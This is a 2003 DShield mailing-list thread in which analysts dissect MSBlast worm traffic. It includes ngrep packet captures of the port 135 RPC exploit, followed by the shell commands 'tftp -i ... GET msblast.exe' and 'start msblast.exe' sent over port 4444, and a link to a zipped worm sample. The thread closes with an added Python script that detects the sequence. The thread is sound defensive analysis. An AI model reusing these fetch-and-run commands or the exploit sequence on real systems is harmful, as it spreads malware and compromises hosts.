Reply-to: General DShield Discussion List 

Message: 17

Excellent, Thank you! I know what it is doing fairly well, but I want to
analyze the HOW of it.

Take care,
Chris.


-----Original Message-----
From: list-bounces at dshield.org [mailto:list-bounces at dshield.org] On
Behalf Of Jonathan Rickman
Sent: Monday, August 11, 2003 3:38 PM
To: General DShield Discussion List
Subject: Re: [Dshield] infocon: yellow

On Monday 11 August 2003 17:01, Chris Ream wrote:
> Has anyone captured the packet stream? I've got some sensors listening
> but have not yet seen it. I would like to reconstruct it and disassemble
> it to find out exactly what it's doing.
>
> If anyone has captured it and is willing to share it I would greatly
> appreciate it.

Hex dump from netcat attached.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net




> ATTACHMENT part 3.18 message/rfc822 
Date: Mon, 11 Aug 2003 16:20:03 -0600
From: "Chris Ream" 
To: "'General DShield Discussion List'" 

Subject: RE: [Dshield] infocon: yellow
Message-ID: <001c01c36056$b68b6af0$468d11d8 at CLR>
In-Reply-To: <012501c3604e$b08270c0$07a8a8c0 at delphi>
Content-Type: text/plain;
charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 18

On an initial look, I would agree with you. Now time to fire up IDA Pro
and get this straight.

Chris.


-----Original Message-----
From: list-bounces at dshield.org [mailto:list-bounces at dshield.org] On
Behalf Of Blake McNeill
Sent: Monday, August 11, 2003 3:23 PM
To: General DShield Discussion List
Subject: Re: [Dshield] infocon: yellow

This is a capture from last night, but now we are seeing lots of them. One
person told me that this is the xFocus/Metasploit scan, but we had not seen
it with the second part until this morning, and we had seen lots of
xFocus/Metasploit scans before ( http://www.linklogger.com/RPC_DCOM.htm ), so
I have some doubts about their analysis and perhaps this is the worm.

Blake
http://www.SonicLogger.com - Logging Software for SonicWall and 3Com
http://www.LinkLogger.com - Logging Software for Linksys, Netgear and
Zyxel




> ATTACHMENT part 3.19 message/rfc822 
Date: Mon, 11 Aug 2003 16:26:09 -0600
From: Blake McNeill 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <01bb01c36057$90b8d780$07a8a8c0 at delphi>
References: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
<200308111738.12075.jonathan at xcorps.net>
Content-Type: text/plain; charset=iso-8859-1
MIME-Version: 1.0
Content-Transfer-Encoding: 7BIT
Precedence: list
Reply-to: General DShield Discussion List 

Message: 19

Are you sure this is the worm? It's the same as my capture from last night,
but there are some people saying that this is just the xfocus/metasploit
scan (which I disagree with), as I have gotten far too many of these since
then to be anything other than the worm.

Blake

----- Original Message ----- 
From: "Jonathan Rickman" 
To: "General DShield Discussion List" 

Sent: Monday, August 11, 2003 3:38 PM
Subject: Re: [Dshield] infocon: yellow


> On Monday 11 August 2003 17:01, Chris Ream wrote:
> > Has anyone captured the packet stream? I've got some sensors listening
> > but have not yet seen it. I would like to reconstruct it and disassemble
> > it to find out exactly what it's doing.
> >
> > If anyone has captured it and is willing to share it I would greatly
> > appreciate it.
>
> Hex dump from netcat attached.
>
> -- 
> Jonathan Rickman
> X Corps Security
> http://www.xcorps.net
>
>







> ATTACHMENT part 3.20 message/rfc822 
Date: Mon, 11 Aug 2003 18:40:22 -0400
From: Jonathan Rickman 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <200308111840.22843.jonathan at xcorps.net>
In-Reply-To: <01bb01c36057$90b8d780$07a8a8c0 at delphi>
References: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
<200308111738.12075.jonathan at xcorps.net>
<01bb01c36057$90b8d780$07a8a8c0 at delphi>
Content-Type: text/plain;
charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 20

On Monday 11 August 2003 18:26, Blake McNeill wrote:
> Are you sure this is the worm? It's the same as my capture from last
> night, but there are some people saying that this is just the
> xfocus/metasploit scan (which I disagree with), as I have gotten far too
> many of these since then to be anything other than the worm.

I confirmed (well, as best I could) that the source was infected immediately 
after capture by scanning 4444 with an nmap tcp connect scan.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net




> ATTACHMENT part 3.21 message/rfc822 
Date: Mon, 11 Aug 2003 16:26:56 -0700
From: John Sage 
To: General DShield Discussion List 

Subject: [Dshield] Re: Packet payloads to TCP:135, TCP:4444
Message-ID: <20030811232656.GN24440 at sparky.finchhaven.net>
In-Reply-To: <1060631933.11754.250.camel at bart>
References: <20030811192631.46380.qmail at web20413.mail.yahoo.com>
<1060631933.11754.250.camel at bart>
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 21

On Mon, Aug 11, 2003 at 03:58:53PM -0400, Johannes Ullrich wrote:
> http://johannes.homepc.org/viruszoo/msblast.zip
> please let me know what you find.

Here's a quick snapshot of what one host seems to do:

ngrep_host: src host 12.82.154.207 in snort.log.1060642891
Generated 16:22:28 (TZ -07:00) 08/11/2003

input: snort.log.1060642891
filter: ip and ( src host 12.82.154.207 )
#
T 2003/08/11 16:21:29.473813 12.82.154.207:2406 -> 12.82.140.147:135 [S]
#
T 2003/08/11 16:21:29.723844 12.82.154.207:2406 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:21:31.184005 12.82.154.207:2406 -> 12.82.140.147:135 [AP]
05 00 0b 03 10 00 00 00 48 00 00 00 7f 00 00 00 ........H.......
d0 16 d0 16 00 00 00 00 01 00 00 00 01 00 01 00 ................
a0 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 ...............F
00 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 .....]..........
2b 10 48 60 02 00 00 00 +.H`.... 
#
T 2003/08/11 16:21:31.664210 12.82.154.207:2406 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:21:31.704100 12.82.154.207:2406 -> 12.82.140.147:135 [AP]
#
T 2003/08/11 16:21:31.714051 12.82.154.207:2406 -> 12.82.140.147:135 [AF]
#
T 2003/08/11 16:21:31.714092 12.82.154.207:2406 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:21:31.734052 12.82.154.207:2416 -> 12.82.140.147:4444 [S]
#
T 2003/08/11 16:21:32.004072 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
74 66 74 70 20 2d 69 20 31 32 2e 38 32 2e 31 35 tftp -i 12.82.15
34 2e 32 30 37 20 47 45 54 20 6d 73 62 6c 61 73 4.207 GET msblas
74 2e 65 78 65 0a t.exe. 
#
T 2003/08/11 16:21:32.334124 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:21:53.146276 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
73 74 61 72 74 20 6d 73 62 6c 61 73 74 2e 65 78 start msblast.ex
65 0a e. 
exit



And another:

ngrep_host: src host 12.82.141.200 in snort.log.1060642891
Generated 16:25:10 (TZ -07:00) 08/11/2003

input: snort.log.1060642891
filter: ip and ( src host 12.82.141.200 )
#
T 2003/08/11 16:09:47.092158 12.82.141.200:1070 -> 12.82.140.147:135 [S]
#
T 2003/08/11 16:09:47.552244 12.82.141.200:1070 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:09:48.622333 12.82.141.200:1070 -> 12.82.140.147:135 [AP]
05 00 0b 03 10 00 00 00 48 00 00 00 7f 00 00 00 ........H.......
d0 16 d0 16 00 00 00 00 01 00 00 00 01 00 01 00 ................
a0 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 ...............F
00 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 .....]..........
2b 10 48 60 02 00 00 00 +.H`.... 
#
T 2003/08/11 16:09:49.162599 12.82.141.200:1070 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:09:49.242407 12.82.141.200:1070 -> 12.82.140.147:135 [AP]
#
T 2003/08/11 16:09:49.252459 12.82.141.200:1070 -> 12.82.140.147:135 [AF]
#
T 2003/08/11 16:09:49.252491 12.82.141.200:1070 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:09:49.262406 12.82.141.200:1080 -> 12.82.140.147:4444 [S]
#
T 2003/08/11 16:09:49.592427 12.82.141.200:1080 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:09:49.752452 12.82.141.200:1080 -> 12.82.140.147:4444 [AP]
74 66 74 70 20 2d 69 20 31 32 2e 38 32 2e 31 34 tftp -i 12.82.14
31 2e 32 30 30 20 47 45 54 20 6d 73 62 6c 61 73 1.200 GET msblas
74 2e 65 78 65 0a t.exe. 
#
T 2003/08/11 16:09:50.102490 12.82.141.200:1080 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:10:10.704598 12.82.141.200:1080 -> 12.82.140.147:4444 [AP]
73 74 61 72 74 20 6d 73 62 6c 61 73 74 2e 65 78 start msblast.ex
65 0a e. 
exit




- John
-- 
"Obviously, we do not want to leave zombies around."
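As an added defender-side example (not part of John's message or of any DShield tool), the script below reads the ngrep -x layout of the captures above, reassembles each packet's payload from the hex column, and flags a source host that binds to RPC on 135 and then pushes tftp/start commands over 4444. The sample capture, the 10.0.0.x addresses and the function names are constructed for this example.

```python
import re
from collections import defaultdict

# Constructed sample in the ngrep -x layout of the captures above; addresses are
# placeholders and the 135 payload is cut to the first 16 bytes of the RPC bind.
SAMPLE = """\
T 2003/08/11 16:21:29.473813 10.0.0.5:2406 -> 10.0.0.9:135 [S]
T 2003/08/11 16:21:31.184005 10.0.0.5:2406 -> 10.0.0.9:135 [AP]
05 00 0b 03 10 00 00 00 48 00 00 00 7f 00 00 00 ........H.......
T 2003/08/11 16:21:31.734052 10.0.0.5:2416 -> 10.0.0.9:4444 [S]
T 2003/08/11 16:21:32.084084 10.0.0.5:2416 -> 10.0.0.9:4444 [AP]
74 66 74 70 20 2d 69 20 31 30 2e 30 2e 30 2e 35 tftp -i 10.0.0.5
20 47 45 54 20 6d 73 62 6c 61 73 74 2e 65 78 65  GET msblast.exe
0a .
T 2003/08/11 16:21:53.146276 10.0.0.5:2416 -> 10.0.0.9:4444 [AP]
73 74 61 72 74 20 6d 73 62 6c 61 73 74 2e 65 78 start msblast.ex
65 0a e.
"""
HEADER = re.compile(r"^T (\S+ \S+) (\d+\.\d+\.\d+\.\d+):(\d+) -> "
                    r"(\d+\.\d+\.\d+\.\d+):(\d+) \[(\w+)\]$")
HEXPAIR = re.compile(r"^[0-9a-f]{2}$")

def parse_ngrep(text):
    """Turn ngrep -x output into packets, each carrying its reassembled payload bytes."""
    packets = []
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            ts, src, sport, dst, dport, flags = m.groups()
            packets.append({"ts": ts, "src": src, "sport": int(sport), "dst": dst,
                            "dport": int(dport), "flags": flags, "payload": bytearray()})
            continue
        if not packets or line.startswith("#"):
            continue
        n = 0  # hex column holds at most 16 pairs; the ASCII column follows it
        for tok in line.split():
            if n == 16 or not HEXPAIR.match(tok):
                break
            packets[-1]["payload"].append(int(tok, 16))
            n += 1
    return packets

def find_blaster_sequences(packets):
    """Flag a source that binds to RPC on 135 and then drives a shell on 4444."""
    flows = defaultdict(list)
    for p in packets:
        flows[(p["src"], p["dst"])].append(p)
    findings = []
    for (src, dst), flow in flows.items():
        # DCE RPC bind PDU starts 05 00 0b (version 5.0, packet type 0x0b)
        rpc_bind = any(p["dport"] == 135 and p["payload"][:3] == b"\x05\x00\x0b"
                       for p in flow)
        shell = b"".join(bytes(p["payload"]) for p in flow if p["dport"] == 4444)
        tftp = re.search(rb"tftp -i (\S+) GET (\S+)", shell)
        if rpc_bind and tftp:
            findings.append({"src": src, "dst": dst,
                             "tftp_server": tftp.group(1).decode(),
                             "dropped_file": tftp.group(2).decode(),
                             "executed": (b"start " + tftp.group(2)) in shell})
    return findings
```

Running `find_blaster_sequences(parse_ngrep(SAMPLE))` yields one finding for 10.0.0.5, naming msblast.exe as the dropped file and marking it as started; pointing the same parser at a real ngrep -x log of port 135/4444 traffic gives the list of hosts to quarantine.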

_______________________________________________
list mailing list
list at dshield.org
http://www.dshield.org/mailman/listinfo/list


